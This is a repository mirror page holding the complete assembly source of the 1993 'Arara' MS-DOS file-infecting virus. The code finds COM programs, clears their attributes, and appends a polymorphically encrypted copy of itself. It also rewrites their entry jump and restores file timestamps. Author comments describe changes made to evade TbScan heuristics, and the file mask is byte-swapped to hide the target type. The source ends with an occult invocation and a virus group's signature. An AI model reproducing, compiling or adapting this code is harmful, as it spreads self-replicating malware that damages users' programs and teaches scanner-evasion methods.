ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
bb32e71ff5
MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.arara1.asm
vxunderground d3381d8e02
Add files via upload
2021-01-12 17:31:39 -06:00

421 lines
8.0 KiB
NASM
Raw Blame History

;
; [Arara] Virus
; Generated by [TVG]
; Minor modifications done to avoid heuristic detection by TbScan
; Cloaked with a minor polymorphic protection device
; Created on Monday November 11, 1993
; Written for compilation in A86 pd assembler
;
; This is not a major virus, but I want to see how they react in the Virus
; summary. Maybe they say it's from Bulgaria because of the language. Well,
; if you want me to write something (fairly neutral) about satanism for a mag
; then say it so. I try to keep it interesting...
;
; John Tardy
JMP MAIN
DB 'ž'
MAIN: CALL GETOFS
GETOFS: MOV BP,SP
MOV BP,SS:[BP]
PUSH AX
SUB BP,GETOFS
MAINVIR EQU $
CALL RANDOMIZE
MOV AX,[ORGPRG][BP]
LEA DI,100H
STOSW
MOV AX,[ORGPRG][2][BP]
STOSW
MOV AH,1AH
MOV DX,0FD00H
INT 21H
CALL CHANGE
MOV AH,4EH
SEARCH: LEA DX,FILESPEC[BP]
XOR CX,CX
INT 21H
JNC NOERROR
JMP READY
NOERROR: MOV AX,4300H
MOV DX,0FD1EH
INT 21H
PUSH CX
MOV AX,4301H
XOR CX,CX
INT 21H
MOV AX,3D02H
MOV DX,0FD1EH
INT 21H
XCHG AX,BX
MOV AX,5700H
INT 21H
PUSH CX
PUSH DX
MOV AH,3FH
LEA DX,ORGPRG[BP]
MOV CX,4
INT 21H
MOV CX,W ORGPRG[BP]
XOR CX,0FFFFH
CMP CX,0B2A5H
JE EXEFILE
CMP CX,0A5B2H
JE EXEFILE
CMP B ORGPRG[BP][3],'ž'
JE EXEFILE
MOV AX,4202H
XOR CX,CX
CWD
INT 21H
SUB AX,3
MOV JUMP[1][BP],AX
PUSH BX
PUSH AX
CALL CHANGE
MOV DS,CS
LEA SI,MAIN[BP]
MOV CX,VIRLEN
MOV ES,CS
LEA DI,START[BP]
POP DX
ADD DX,103H
MOV AX,3
CALL ENCRYPT
POP BX
MOV AH,40H
MOV DS,CS
LEA DX,START[BP]
INT 21H
MOV AX,4200H
XOR CX,CX
CWD
INT 21H
MOV AH,40H
LEA DX,JUMP[BP]
MOV CX,4
INT 21H
CALL CLOSE
JMP READY
EXEFILE: CALL CLOSE
MOV AH,4FH
JMP SEARCH
READY EQU $
ERROR: MOV AH,1AH
MOV DX,80H
INT 21H
MOV DS,CS
POP AX
MOV BX,0FEFFH
XOR BX,0FFFFH
JMP BX
CLOSE: POP SI
POP DX
POP CX
MOV AX,5700H
INC AX
INT 21H
MOV AH,3EH
INT 21H
POP CX
MOV AX,4300H
INC AX
MOV DX,0FD1EH
INT 21H
MOV DS,CS
MOV ES,CS
PUSH SI
RET
DB '[ARARA]'
CHANGE: MOV AX,W WEXL[BP]
XCHG AL,AH
MOV W WEXL[BP],AX
RET
;---------------------------------------------------------------------------
;
; Encryption engine
;
;---------------------------------------------------------------------------
RANDOMIZE: MOV CX,MTLEN
INCREASE: MOV SI,CX
INC B MT[SI][-1][BP]
LOOP INCREASE
CHECKIT: MOV CX,MTMAXLEN
CHECKVAL: MOV SI,CX
MOV AH,MT[SI][-1][BP]
MOV AL,MTMAX[SI][-1][BP]
CMP AH,AL
JB GOODVAL
MOV B MT[SI][-1][BP],0
GOODVAL: LOOP CHECKVAL
XOR AX,AX
MOV DS,AX
NOTZERO: MOV AL,B DS:[046CH]
OR AL,AL
JZ NOTZERO
MOV DS,CS
MOV ENCRYPTVAL[BP],AL
RET
DUMMY1 DW 0 ; offset mov bx,si,di
DUMMY2 DW 0 ; offset loop
CALNEWCX DW 0
ENCRYPT: PUSH DS
PUSH SI
PUSH CX
MOV AMOUNT[BP],AX
MOV COUNTLOOP[BP],CX
MOV CALNEWCX[BP],DI
LEA SI,MT[BP]
CALL INSERTGARBAGE
XOR AX,AX
LODSB
PUSH AX
LEA BX,VAL2T[BP]
CALL USETABLE
ADD AX,W [COUNTLOOP][BP]
STOSW
LODSB
PUSH AX
CALL INSERTGARBAGE
LEA BX,VAL3SUB[BP]
CALL USETABLE
POP AX
SHL AX,2
POP BX
ADD AX,BX
LEA BX,VAL3T[BP]
CALL USETABLE
CALL INSERTGARBAGE
LODSB
PUSH AX
PUSH AX
LEA BX,VAL1T[BP]
CALL USETABLE
MOV DUMMY1[BP],DI
STOSW
CALL INSERTGARBAGE
MOV DUMMY2[BP],DI
LODSB
LEA BX,VAL4T[BP]
CALL USETABLE
POP BX
LODSB
MOV FUNCTION[BP],AL
SHL AX,2
ADD AX,BX
LEA BX,VAL5T[BP]
CALL USETABLE
MOV AL,B [ENCRYPTVAL][BP]
STOSB
CALL INSERTGARBAGE
POP AX
LEA BX,VAL6T[BP]
CALL USETABLE
LODSB
LEA BX,VAL7T[BP]
CALL USETABLE
MOV AX,DI
MOV BX,DUMMY2[BP]
SUB AX,BX
NOT AX
STOSB
PUSH DI
MOV AX,CALNEWCX[BP]
SUB DI,AX
ADD DI,DX
MOV AX,DI
MOV DI,DUMMY1[BP]
STOSW
POP DI
POP CX
POP SI
POP DS
CODEIT: LODSB
CMP B FUNCTION[BP],0
JNE WHATELSE1
XOR AL,ENCRYPTVAL[BP]
JMP NOELSE
WHATELSE1: CMP B FUNCTION[BP],1
JNE WHATELSE2
SUB AL,ENCRYPTVAL[BP]
JMP NOELSE
WHATELSE2: ADD AL,ENCRYPTVAL[BP]
NOELSE: STOSB
LOOP CODEIT
MOV CX,CALNEWCX[BP]
SUB DI,CX
MOV CX,DI
RET
USETABLE:
XLAT
STOSB
RET
INSERTGARBAGE: PUSH DS
PUSH SI
PUSH AX
PUSH CX
PUSH DS
PUSH SI
XOR AX,AX
MOV DS,AX
MOV AX,WORD PTR DS:[046CH]
ADD AX,DI
SUB AX,SI
ADD AX,BP
ADD AX,WORD PTR CS:[DI][BP]
ADD AL,AH
ADD AX,CX
AND AX,02H
AMOUNT EQU $-2
MOV CX,AX
AND AX,7H
POP SI
POP DS
CMP CX,0
JE NOGARBAGE
INSERT: LEA BX,RANDOMCODE[BP]
CALL USETABLE
ADD AX,DI
ADD AX,SI
ADD AX,WORD PTR CS:[DI][BP]
AND AX,7
LOOP INSERT
NOGARBAGE: POP CX
POP AX
POP SI
POP DS
RET
MTMAX DB 4 ; MT 0
DB 10 ; MT 1
DB 3 ; MT 2
DB 2 ; MT 4
DB 3 ; MT 5
DB 2 ; MT 6
DB 6 ; MT 7
MTMAXLEN EQU $-MTMAX
MT DB 0 ; MT 0
DB 0 ; MT 1
DB 0 ; MT 2
DB 0 ; MT 4
DB 0 ; MT 5
DB 0 ; MT 6
DB 0 ; MT 7
MTLEN EQU $-MT
; Offset Encrypted part
ENCOFS DW 0
; Counterloop decryption
COUNTLOOP DW 0
; Encryption Valua
ENCRYPTVAL DB 0
; Function
FUNCTION DB 0 ; 0=xor, 1=add, 2=sub (xchange in encr)
; MT 0
VAL1T DB 0BBH,0BEH,0BFH ; Mov Bx,Si,Di
; MT 1
VAL2T DB 0B8H,0BBH,0BAH,0BDH ; Mov Ax,Bx,Dx,Bp
; MT 2 V
VAL3SUB DB 089H, 087H, 087H, 031H, 001H, 009H
DB 08BH, 033H, 003H, 00BH ; NIEUW
; MT 1 H
VAL3T DB 0C1H,0D9H,0D1H,0E9H ; Mov Ax,Bx,Dx,Bp -> Cx
DB 0C1H,0CBH,0CAH,0CDH ; Xchg Ax,Bx,Dx,Bp -> Cx
DB 0C1H,0D9H,0D1H,0E9H ; Xchg Ax,Bx,Dx,Bp <- Cx
DB 0C1H,0D9H,0D1H,0E9H ; Xor Ax,Bx,Dx,Bp -> Cx
DB 0C1H,0D9H,0D1H,0E9H ; Add Ax,Bx,Dx,Bp -> Cx
DB 0C1H,0D9H,0D1H,0E9H ; Or Ax,Bx,Dx,Bp -> Cx
DB 0C8H,0CBH,0CAH,0CDH ; NIEUW
DB 0C8H,0CBH,0CAH,0CDH ;
DB 0C8H,0CBH,0CAH,0CDH ;
DB 0C8H,0CBH,0CAH,0CDH ;
; MT 4 H
VAL4T DB 080H,082H ; 00 / 0000
; MT 5 V
; MT 0 H
VAL5T DB 037H,034H,035H,037H ; Xor Bx,Si,Di,bx
DB 007H,004H,005H,007H ; Add Bx,Si,Di,bx
DB 02FH,02CH,02DH,02FH ; Sub Bx,Si,Di,bx
; MT 0 H
VAL6T DB 043H,046H,047H ; Inc Bx,Si,Di
; MT 6 H
VAL7T DB 0E0H,0E2H ; Loop Equal Functions
; MT 7 H
RANDOMCODE DB 0FCH,0F8H,090H,0F9H,0F5H ; Random code
DB 0CCH,0FBH,02EH,0F5H
FILESPEC DB '*.OCM',0
WEXL EQU FILESPEC+2
JUMP DB 0E9H
DW 0
DB 'ž'
ORGPRG DB 0CDH,020H,'AR'
;
; The Eighteenth Enochian Key opens the gates of Hell and casts up Lucifer
; and his blessing.
;
; Enochian
DB 13,10,'ILASA MICALAZODA OLAPIRETA IALPEREJI BELIORE: DAS ODO BUSADIRE OIAD OUOARESA'
DB 13,10,'CAOSAGO: CASAREMEJI LAIADA ERANU BERINUTASA CAFAFAME DAS IVEMEDA AQOSO ADOHO'
DB 13,10,'MOZ, OD MAOFASA. BOLAPE COMO BELIORETA PAMEBETA. ZODACARE OD ZODAMERANU! ODO'
DB 13,10,'CICALE QAA. ZODOREJE, LAPE ZODIREDO NOCO MADA, HOATHAHE SAITAN!'
; English
; O thou mighty light and burning flame of comfort!, that unveilest the glory
; of Satan to the center of the Earth; in whom the great secrets of truth
; have their abiding; that is called in thy kingdom: "strength through joy,"
; and is not to be measured. Be thou a window of comfort unto me. Move there-
; fore, and appear! Open the mysteries of your creation! Be friendly unto me,
; for I am the same!, the true worshipper of the highest end ineffable King
; of Hell!
START EQU $
VIRLEN EQU $-MAIN
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄ> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <ÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Reference in New Issue View Git Blame Copy Permalink